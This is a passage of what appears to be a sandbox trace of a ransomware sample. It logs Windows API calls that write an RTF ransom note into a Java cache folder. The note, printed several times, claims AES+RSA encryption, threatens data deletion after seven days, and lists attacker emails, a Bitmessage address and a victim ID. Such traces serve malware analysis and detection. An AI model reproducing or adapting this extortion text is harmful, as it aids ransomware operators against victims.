\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0271.396] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0271.397] CloseHandle (hObject=0x2ec) returned 1 [0271.398] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\#readme_eman#.rtf")) returned 0xffffffff [0271.398] GetLastError () returned 0x2 [0271.398] CreateFileW (lpFileName="C:\\Users\\All Users\\Oracle\\Java\\installcache_x64\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\oracle\\java\\installcache_x64\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0271.398] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0271.398] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. 